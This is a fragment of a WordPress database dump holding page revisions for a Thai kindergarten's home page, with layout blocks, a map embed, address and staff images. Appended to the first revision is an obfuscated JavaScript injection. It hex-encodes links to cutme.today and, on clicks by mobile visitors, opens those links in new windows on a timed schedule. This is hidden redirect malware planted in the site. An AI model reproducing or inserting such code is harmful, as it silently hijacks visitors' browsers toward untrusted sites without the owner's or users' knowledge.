{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:21:46','2024-09-24 04:21:46','',19,'http://watprato.ssk.in.th/?p=422',0,'revision','',0),
(423,2,'2024-09-24 11:22:42','2024-09-24 04:22:42','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span 